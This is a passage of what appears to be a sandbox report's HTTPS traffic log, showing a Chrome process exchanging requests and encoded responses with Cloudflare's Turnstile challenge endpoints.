                                                        Data Ascii: bGGqMmmvZ2mxbifwcjOvY/KydaQsbnMuKez29Car9HY2aTYxqC83uXsrc/oz+Sq8cjp8+LY6e+6zcn14gPk+uDy0AnIwgv26gvL7ALxBtzj89boGtUO9w0d7fob+/ID9d36CiAqAgjl9wAHIyoIDiglKhg7HA0sLi4w/RNBOD8CMyg3JvxMTQQqPxBQIk0rQxBRNScNNlJQM01LL15hUDUfW1IjK1tNJ0s/KEthaWZFX0daNUwuaHRJTnBBWEB0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.549750104.18.94.414433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:38 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8c285aefbf971821/1726232795430/35d15596e15914e0c91615707e683afd29cca0ae83719ab89b59c4812845ce0c/F9IyQelDIMunbIF HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/eexie/0x4AAAAAAAgfyeXMLVB_Rwr6/auto/fbE/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:38 UTC143INHTTP/1.1 401 Unauthorized
                                                        Date: Fri, 13 Sep 2024 13:06:38 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 1
                                                        Connection: close
                                                        2024-09-13 13:06:38 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 4e 64 46 56 6c 75 46 5a 46 4f 44 4a 46 68 56 77 66 6d 67 36 5f 53 6e 4d 6f 4b 36 44 63 5a 71 34 6d 31 6e 45 67 53 68 46 7a 67 77 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gNdFVluFZFODJFhVwfmg6_SnMoK6DcZq4m1nEgShFzgwAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                        2024-09-13 13:06:38 UTC1INData Raw: 4a
                                                        Data Ascii: J


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.549749104.18.95.414433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:38 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1739610885:1726229693:8dNeNNr3NVIZNVDXB9fIh6-yB2WjScXMoVCZfOmpcdU/8c285aefbf971821/7cbe35d3fcb33be HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:38 UTC379INHTTP/1.1 404 Not Found
                                                        Date: Fri, 13 Sep 2024 13:06:38 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 7
                                                        Connection: close
                                                        cf-chl-out: BLaKmRxUsmy7349Mm1VfUqcOzVqjRTefLag=$A1KfUy30SkH6YPAP
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Server: cloudflare
                                                        CF-RAY: 8c285b0c3d5fc44f-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:06:38 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                        Data Ascii: invalid


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.549751104.18.94.414433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:39 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8c285aefbf971821/1726232795433/5XXXqDfOKsEgfK_ HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/eexie/0x4AAAAAAAgfyeXMLVB_Rwr6/auto/fbE/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:39 UTC200INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:06:39 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 61
                                                        Connection: close
                                                        Server: cloudflare
                                                        CF-RAY: 8c285b164c5e440d-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:06:39 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2d 00 00 00 40 08 02 00 00 00 01 12 69 49 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDR-@iIIDAT$IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.549752104.18.94.414433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:40 UTC927OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1739610885:1726229693:8dNeNNr3NVIZNVDXB9fIh6-yB2WjScXMoVCZfOmpcdU/8c285aefbf971821/7cbe35d3fcb33be HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 31472
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Content-type: application/x-www-form-urlencoded
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        CF-Challenge: 7cbe35d3fcb33be
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Origin: https://challenges.cloudflare.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/eexie/0x4AAAAAAAgfyeXMLVB_Rwr6/auto/fbE/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:40 UTC16384OUTData Raw: 76 5f 38 63 32 38 35 61 65 66 62 66 39 37 31 38 32 31 3d 53 45 67 78 79 5a 36 4b 46 69 67 71 67 42 59 65 5a 41 42 61 67 65 72 36 31 41 6f 78 53 49 6e 71 4d 41 31 41 32 49 71 4f 41 50 41 74 49 34 4f 41 6b 41 6b 49 32 6b 5a 49 41 68 32 41 61 49 49 65 4f 36 69 41 32 47 46 41 73 63 49 65 50 71 44 78 65 4b 41 6b 78 36 33 42 44 51 5a 5a 6f 6e 41 5a 73 5a 64 38 46 2d 41 5a 6e 24 50 41 68 49 5a 72 41 65 49 49 39 67 41 7a 6f 45 41 73 33 33 67 36 61 74 62 61 65 51 49 41 55 37 41 41 55 4a 4d 72 6d 6c 41 36 7a 51 66 4f 6d 32 4a 71 4d 41 64 52 6e 41 75 59 42 57 45 7a 32 41 32 63 6d 70 35 32 71 6c 38 72 67 41 56 73 7a 4d 58 79 35 30 38 78 41 50 41 67 44 6f 4a 42 44 38 52 69 47 37 4a 34 30 4b 72 54 30 34 41 75 62 2d 34 44 51 4a 53 77 38 53 55 77 30 4c 66 59 6b 53 41 66
                                                        Data Ascii: v_8c285aefbf971821=SEgxyZ6KFigqgBYeZABager61AoxSInqMA1A2IqOAPAtI4OAkAkI2kZIAh2AaIIeO6iA2GFAscIePqDxeKAkx63BDQZZonAZsZd8F-AZn$PAhIZrAeII9gAzoEAs33g6atbaeQIAU7AAUJMrmlA6zQfOm2JqMAdRnAuYBWEz2A2cmp52ql8rgAVszMXy508xAPAgDoJBD8RiG7J40KrT04Aub-4DQJSw8SUw0LfYkSAf
                                                        2024-09-13 13:06:40 UTC15088OUTData Raw: 77 6f 4b 37 4e 78 61 54 66 58 2b 4e 78 76 41 59 2b 56 41 61 78 71 49 65 4d 41 73 49 38 78 5a 67 36 32 61 39 37 57 78 41 79 41 54 75 6f 4d 36 71 66 34 72 36 45 41 36 41 61 4c 36 41 41 56 41 50 72 65 6f 36 34 41 7a 49 34 38 41 66 56 6d 49 42 4c 41 46 41 58 49 42 4f 36 47 41 51 6e 5a 78 36 44 41 44 55 6f 4b 41 77 41 38 49 42 6a 57 58 66 4e 66 48 78 36 54 66 65 6e 32 6e 36 4b 41 39 78 42 41 65 42 61 4b 49 5a 4f 41 72 41 7a 67 41 49 41 4c 38 61 49 36 78 5a 57 41 4d 78 4f 49 5a 34 41 75 49 71 49 41 48 41 33 41 69 54 41 6c 46 54 41 53 4f 41 69 41 61 6e 71 6e 5a 36 6e 68 4d 5a 4f 41 36 6e 4b 49 65 78 65 44 52 53 75 6e 75 32 31 41 68 32 5a 4b 36 44 66 44 6e 36 6f 65 72 42 33 4f 41 55 41 2b 73 5a 45 32 79 41 6e 46 34 49 61 67 70 31 41 4e 35 2d 46 36 24 41 59 77 55
                                                        Data Ascii: woK7NxaTfX+NxvAY+VAaxqIeMAsI8xZg62a97WxAyATuoM6qf4r6EA6AaL6AAVAPreo64AzI48AfVmIBLAFAXIBO6GAQnZx6DADUoKAwA8IBjWXfNfHx6Tfen2n6KA9xBAeBaKIZOArAzgAIAL8aI6xZWAMxOIZ4AuIqIAHA3AiTAlFTASOAiAanqnZ6nhMZOA6nKIexeDRSunu21Ah2ZK6DfDn6oerB3OAUA+sZE2yAnF4Iagp1AN5-F6$AYwU
                                                        2024-09-13 13:06:41 UTC330INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:06:41 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 28064
                                                        Connection: close
                                                        cf-chl-gen: tbS5LDT8fj8LKCjficuxFGmeVFMLXDc8XJRXGNZvpLkljSLyfre0f49+Gb6XD33NBCfkU763kz2D2lNa$fpuD+QYHW1SEa7M4
                                                        Server: cloudflare
                                                        CF-RAY: 8c285b1e9f744265-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:06:41 UTC1039INData Raw: 72 36 75 36 66 70 57 41 71 62 75 70 67 37 2b 35 72 37 36 67 7a 64 43 50 6b 36 69 51 69 61 69 73 6c 4a 76 4e 78 36 69 66 33 64 2b 69 73 38 2b 34 32 72 75 33 34 37 50 70 6f 37 65 32 33 4e 2b 6f 72 74 54 52 38 63 72 6e 72 2f 6a 4b 2b 2f 62 2b 30 63 6e 53 76 51 4d 44 2b 39 4c 78 77 74 6e 4a 2f 4f 48 49 79 63 6f 4f 42 64 45 50 2f 51 6e 53 46 76 67 57 36 74 48 76 45 76 41 62 38 39 4c 65 38 69 51 68 35 42 34 41 35 2f 76 6c 4b 53 49 68 41 68 48 34 36 53 38 56 38 77 50 79 4e 77 77 74 44 66 63 61 4e 2f 51 37 4d 67 73 36 47 53 51 62 4d 53 52 42 45 77 68 4b 4e 51 68 51 4f 56 45 38 43 6a 38 30 4b 77 34 57 45 68 6b 76 4a 31 4e 64 4d 79 78 43 4c 42 6b 2b 4a 56 39 65 58 31 35 55 4a 55 49 32 50 43 68 41 4d 58 4a 47 64 47 4e 72 53 32 6c 56 63 46 4e 47 65 33 6c 50 50 6e 78
                                                        Data Ascii: r6u6fpWAqbupg7+5r76gzdCPk6iQiaislJvNx6if3d+is8+42ru347Ppo7e23N+ortTR8crnr/jK+/b+0cnSvQMD+9LxwtnJ/OHIycoOBdEP/QnSFvgW6tHvEvAb89Le8iQh5B4A5/vlKSIhAhH46S8V8wPyNwwtDfcaN/Q7Mgs6GSQbMSRBEwhKNQhQOVE8Cj80Kw4WEhkvJ1NdMyxCLBk+JV9eX15UJUI2PChAMXJGdGNrS2lVcFNGe3lPPnx
                                                        2024-09-13 13:06:41 UTC1369INData Raw: 5a 69 71 62 50 6a 74 61 55 78 37 6e 43 30 73 50 50 75 5a 65 74 75 64 2f 53 73 36 54 58 78 38 47 2b 31 64 62 4d 78 64 76 6e 70 61 75 75 30 38 66 6a 7a 65 6a 44 77 38 54 56 30 37 50 50 36 50 48 34 33 74 4c 79 77 50 48 6e 35 64 44 49 77 4d 76 67 35 4d 34 4a 2b 4d 72 4e 44 75 6a 71 44 51 50 67 35 75 37 76 36 50 6e 59 31 51 48 7a 41 42 38 50 47 2b 59 55 41 53 6f 6f 41 66 6f 42 42 65 38 42 2f 67 37 74 4a 79 34 66 39 52 6e 78 45 54 6f 6f 4a 7a 59 54 44 51 77 4c 4d 76 34 34 4e 51 51 63 4f 79 49 6b 51 69 39 49 53 42 73 71 4a 42 38 6a 49 46 42 41 49 6a 4d 77 57 6a 30 39 54 54 41 58 54 6a 70 53 49 6c 52 63 4a 52 38 67 51 55 52 64 53 31 39 70 62 47 64 6f 63 48 42 33 58 32 74 4b 63 6e 5a 55 53 30 70 55 66 6c 78 59 4f 30 46 6c 57 34 64 53 55 33 70 46 54 44 39 34 56 30
                                                        Data Ascii: ZiqbPjtaUx7nC0sPPuZetud/Ss6TXx8G+1dbMxdvnpauu08fjzejDw8TV07PP6PH43tLywPHn5dDIwMvg5M4J+MrNDujqDQPg5u7v6PnY1QHzAB8PG+YUASooAfoBBe8B/g7tJy4f9RnxETooJzYTDQwLMv44NQQcOyIkQi9ISBsqJB8jIFBAIjMwWj09TTAXTjpSIlRcJR8gQURdS19pbGdocHB3X2tKcnZUS0pUflxYO0FlW4dSU3pFTD94V0
                                                        2024-09-13 13:06:41 UTC1369INData Raw: 7a 36 2f 42 71 39 7a 56 78 71 2f 63 31 64 65 78 72 39 58 47 74 39 54 56 35 62 71 37 31 65 72 6d 79 4d 2b 39 76 71 72 42 72 38 6e 47 31 76 50 47 39 4c 58 57 75 64 66 71 76 76 6d 2f 7a 74 4c 77 38 4e 66 30 36 2b 67 4d 79 39 37 67 2b 65 59 55 2f 75 76 72 38 67 55 61 46 74 4d 51 45 78 51 57 2b 66 44 65 39 68 34 52 39 52 49 67 47 52 4d 54 36 76 6f 59 36 76 34 44 48 52 73 6a 49 79 49 55 45 54 49 4c 46 41 55 72 4f 43 6f 34 44 7a 34 4d 48 44 2f 2b 42 41 59 6a 4f 69 63 37 48 52 6f 6b 49 53 63 63 4a 31 49 4d 45 78 4e 47 4b 69 34 54 4d 46 6f 57 56 69 6c 59 50 54 38 63 4d 6b 42 6f 49 6c 68 71 52 31 59 37 4e 7a 70 41 5a 54 4a 71 4c 45 31 72 4d 56 42 72 55 48 6c 77 4f 48 30 35 65 31 56 61 67 6c 39 4e 55 54 36 49 5a 59 4a 46 57 56 31 6e 61 45 5a 37 53 55 35 38 52 33 42
                                                        Data Ascii: z6/Bq9zVxq/c1dexr9XGt9TV5bq71ermyM+9vqrBr8nG1vPG9LXWudfqvvm/ztLw8Nf06+gMy97g+eYU/uvr8gUaFtMQExQW+fDe9h4R9RIgGRMT6voY6v4DHRsjIyIUETILFAUrOCo4Dz4MHD/+BAYjOic7HRokISccJ1IMExNGKi4TMFoWVilYPT8cMkBoIlhqR1Y7NzpAZTJqLE1rMVBrUHlwOH05e1Vagl9NUT6IZYJFWV1naEZ7SU58R3B
                                                        2024-09-13 13:06:41 UTC1369INData Raw: 39 79 61 74 4e 6a 42 7a 74 66 57 74 36 4c 53 77 4c 37 71 75 37 65 71 76 73 76 43 38 37 48 54 30 71 36 32 38 4f 72 36 2b 50 54 5a 79 63 6e 39 31 39 54 57 78 4d 44 53 43 41 41 4c 79 67 48 4d 78 75 58 6e 7a 50 49 41 41 78 45 45 7a 66 6a 6c 38 76 62 38 35 2f 58 36 36 4f 2f 38 37 76 54 74 41 66 50 33 2b 41 59 64 44 66 73 47 43 79 38 41 43 67 41 4e 2f 52 45 44 47 51 67 78 4f 6a 6b 6c 39 78 73 4d 38 6a 41 69 51 42 34 32 4d 67 46 4b 52 44 51 67 50 53 67 58 4d 43 38 79 53 79 70 54 55 30 42 49 47 44 73 56 4b 78 67 59 56 6c 67 68 57 45 34 35 57 7a 35 53 4a 31 67 38 49 57 56 67 62 31 70 50 4c 47 6c 67 5a 69 63 76 64 47 39 5a 62 31 4e 79 54 47 6c 2f 4d 6e 30 36 65 32 31 42 65 56 64 38 61 6c 4a 37 59 6b 74 2f 68 48 69 4a 69 33 75 4d 6b 32 4a 6f 68 6c 4a 4d 65 47 56 61
                                                        Data Ascii: 9yatNjBztfWt6LSwL7qu7eqvsvC87HT0q628Or6+PTZycn919TWxMDSCAALygHMxuXnzPIAAxEEzfjl8vb85/X66O/87vTtAfP3+AYdDfsGCy8ACgAN/REDGQgxOjkl9xsM8jAiQB42MgFKRDQgPSgXMC8ySypTU0BIGDsVKxgYVlghWE45Wz5SJ1g8IWVgb1pPLGlgZicvdG9Zb1NyTGl/Mn06e21BeVd8alJ7Ykt/hHiJi3uMk2JohlJMeGVa
                                                        2024-09-13 13:06:41 UTC1369INData Raw: 48 6a 70 4c 75 38 30 72 76 48 71 73 50 75 72 72 44 4e 37 2b 36 2f 74 63 62 50 34 74 54 4e 32 2b 66 56 38 2f 61 36 38 66 66 76 33 76 76 34 78 2f 54 38 36 50 69 2b 78 75 4c 6c 78 68 41 4d 41 38 77 4f 41 68 44 6c 37 4e 45 46 47 67 2f 58 45 74 4c 35 2f 68 4c 61 34 65 38 59 2b 65 48 6f 33 52 30 50 41 51 34 69 4a 4f 34 47 45 53 59 56 44 51 45 7a 47 6a 55 4c 37 78 37 39 47 67 73 6b 46 78 41 53 49 69 67 57 52 79 4e 44 4a 54 59 76 54 30 56 4e 50 53 55 50 56 31 55 72 4b 45 67 6e 52 42 31 4c 53 57 45 58 46 42 6f 64 4c 6a 68 53 55 47 6f 7a 49 7a 35 4b 50 31 70 59 55 43 31 79 4c 43 73 30 64 6c 63 76 62 56 68 64 4f 33 6b 2f 56 49 4a 53 62 30 77 37 66 6e 46 44 56 31 52 42 62 47 42 45 68 46 78 6b 69 31 4b 47 69 70 61 51 63 47 68 6b 6d 58 78 35 62 49 74 2f 62 47 2b 5a 6a
                                                        Data Ascii: HjpLu80rvHqsPurrDN7+6/tcbP4tTN2+fV8/a68ffv3vv4x/T86Pi+xuLlxhAMA8wOAhDl7NEFGg/XEtL5/hLa4e8Y+eHo3R0PAQ4iJO4GESYVDQEzGjUL7x79GgskFxASIigWRyNDJTYvT0VNPSUPV1UrKEgnRB1LSWEXFBodLjhSUGozIz5KP1pYUC1yLCs0dlcvbVhdO3k/VIJSb0w7fnFDV1RBbGBEhFxki1KGipaQcGhkmXx5bIt/bG+Zj
                                                        2024-09-13 13:06:41 UTC1369INData Raw: 70 35 4b 58 70 34 72 32 2f 76 73 48 52 74 4f 53 78 7a 72 48 4f 37 4e 48 4b 39 74 2b 32 30 74 2f 6b 39 2b 37 35 76 2f 58 71 36 64 54 72 39 77 4d 41 44 51 44 4b 39 4d 72 6b 41 65 45 54 30 73 7a 75 31 4e 66 55 36 68 48 68 44 74 37 77 33 76 73 64 47 2b 63 6f 43 2b 54 6e 4b 69 55 6a 37 69 38 67 35 67 73 59 46 52 6b 72 2b 42 73 73 4f 43 30 32 45 77 77 78 4f 68 63 51 52 42 6b 42 53 79 73 6f 51 30 6b 4f 47 67 34 66 45 53 31 53 54 31 4d 30 53 55 73 54 47 7a 77 2b 47 56 77 71 48 55 49 34 55 6d 64 6d 52 6c 77 6f 52 47 70 4f 4a 43 55 77 4d 45 46 70 4d 55 56 53 56 6b 52 78 4d 45 38 32 61 46 52 4c 4e 33 52 63 62 56 31 79 57 6b 56 62 63 57 4e 39 64 6a 39 6d 6b 48 31 70 69 33 47 55 6c 57 31 79 61 5a 4e 33 56 49 78 37 68 6d 79 58 6b 6f 75 5a 58 61 47 67 59 58 61 48 6d 34
                                                        Data Ascii: p5KXp4r2/vsHRtOSxzrHO7NHK9t+20t/k9+75v/Xq6dTr9wMADQDK9MrkAeET0szu1NfU6hHhDt7w3vsdG+coC+TnKiUj7i8g5gsYFRkr+BssOC02EwwxOhcQRBkBSysoQ0kOGg4fES1ST1M0SUsTGzw+GVwqHUI4UmdmRlwoRGpOJCUwMEFpMUVSVkRxME82aFRLN3RcbV1yWkVbcWN9dj9mkH1pi3GUlW1yaZN3VIx7hmyXkouZXaGgYXaHm4
                                                        2024-09-13 13:06:41 UTC1369INData Raw: 77 63 33 44 33 37 50 76 38 50 4c 77 74 50 54 31 39 65 2f 39 39 75 48 5a 39 77 48 58 2b 2b 59 43 32 2f 66 44 42 41 6a 64 79 41 62 7a 41 41 59 51 36 65 55 56 45 39 6a 31 31 42 67 59 39 52 63 61 41 66 41 52 42 64 38 42 48 41 6f 6a 41 68 55 4e 35 68 38 67 47 79 6b 42 36 79 6f 47 45 67 67 6b 39 7a 51 31 4e 7a 58 34 4f 54 6f 37 4e 43 4d 36 47 66 6b 30 4e 41 67 71 42 45 49 33 49 6c 42 4e 4e 45 78 55 55 54 68 4d 54 6b 4e 50 4f 52 52 4a 50 52 78 4a 57 44 49 31 59 46 6f 31 4f 53 46 49 58 69 77 6b 54 45 78 72 57 57 5a 42 58 46 39 6b 57 47 74 75 5a 47 39 4a 65 58 52 4f 50 58 78 78 51 56 4b 45 67 48 42 61 68 6f 56 7a 53 55 53 49 59 59 42 37 6a 48 75 45 6a 49 36 41 63 6c 43 55 57 58 5a 55 6d 49 43 67 6e 70 78 32 66 70 79 66 5a 47 57 6d 70 58 36 43 72 4b 4f 42 59 71 69
                                                        Data Ascii: wc3D37Pv8PLwtPT19e/99uHZ9wHX++YC2/fDBAjdyAbzAAYQ6eUVE9j11BgY9RcaAfARBd8BHAojAhUN5h8gGykB6yoGEggk9zQ1NzX4OTo7NCM6Gfk0NAgqBEI3IlBNNExUUThMTkNPORRJPRxJWDI1YFo1OSFIXiwkTExrWWZBXF9kWGtuZG9JeXROPXxxQVKEgHBahoVzSUSIYYB7jHuEjI6AclCUWXZUmICgnpx2fpyfZGWmpX6CrKOBYqi
                                                        2024-09-13 13:06:41 UTC1369INData Raw: 2f 50 69 36 2f 33 79 30 4c 48 38 2b 39 58 64 41 2f 37 45 31 62 38 45 78 77 44 32 42 38 76 42 44 51 72 36 78 52 45 52 2f 74 51 51 45 75 72 55 42 77 76 62 32 4f 38 63 44 50 6b 6d 48 68 44 78 4a 69 50 6f 41 69 73 6e 36 6a 41 75 4c 42 77 4f 36 7a 41 66 36 65 38 7a 4e 42 49 2b 4d 78 49 4f 50 7a 77 72 39 54 78 41 47 69 4a 46 52 52 30 4a 4e 30 64 49 4a 6c 4a 4c 45 53 35 4c 55 43 6f 75 57 56 4e 53 58 46 78 58 48 54 35 59 57 6a 56 59 59 6d 42 51 4e 6d 42 66 50 53 6c 74 61 45 49 36 5a 32 74 72 4d 57 78 76 63 46 4a 6a 64 57 4d 35 63 33 67 38 4d 6a 68 38 65 7a 59 39 65 31 70 57 51 59 56 65 57 6b 53 4a 64 34 53 4e 69 34 78 79 61 6f 74 6e 63 70 53 49 65 56 69 5a 66 6e 32 55 67 5a 79 63 66 6f 61 62 64 34 61 54 6d 4b 4f 58 6f 5a 31 71 66 71 6d 71 72 4a 4b 64 73 48 53 6f
                                                        Data Ascii: /Pi6/3y0LH8+9XdA/7E1b8ExwD2B8vBDQr6xRER/tQQEurUBwvb2O8cDPkmHhDxJiPoAisn6jAuLBwO6zAf6e8zNBI+MxIOPzwr9TxAGiJFRR0JN0dIJlJLES5LUCouWVNSXFxXHT5YWjVYYmBQNmBfPSltaEI6Z2trMWxvcFJjdWM5c3g8Mjh8ezY9e1pWQYVeWkSJd4SNi4xyaotncpSIeViZfn2UgZycfoabd4aTmKOXoZ1qfqmqrJKdsHSo


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.549753104.18.95.414433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:41 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8c285aefbf971821/1726232795433/5XXXqDfOKsEgfK_ HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:41 UTC200INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:06:41 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 61
                                                        Connection: close
                                                        Server: cloudflare
                                                        CF-RAY: 8c285b219a3e191e-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:06:41 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2d 00 00 00 40 08 02 00 00 00 01 12 69 49 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDR-@iIIDAT$IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.549754104.18.95.414433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:41 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1739610885:1726229693:8dNeNNr3NVIZNVDXB9fIh6-yB2WjScXMoVCZfOmpcdU/8c285aefbf971821/7cbe35d3fcb33be HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:41 UTC379INHTTP/1.1 404 Not Found
                                                        Date: Fri, 13 Sep 2024 13:06:41 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 7
                                                        Connection: close
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        cf-chl-out: K5oK1L4nlkJ7AOLEcQVynQxfbQTp91cU4Jo=$YdppOHcaUekSspG2
                                                        Server: cloudflare
                                                        CF-RAY: 8c285b23fc7c43a7-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:06:41 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                        Data Ascii: invalid


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.549755104.18.94.414433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
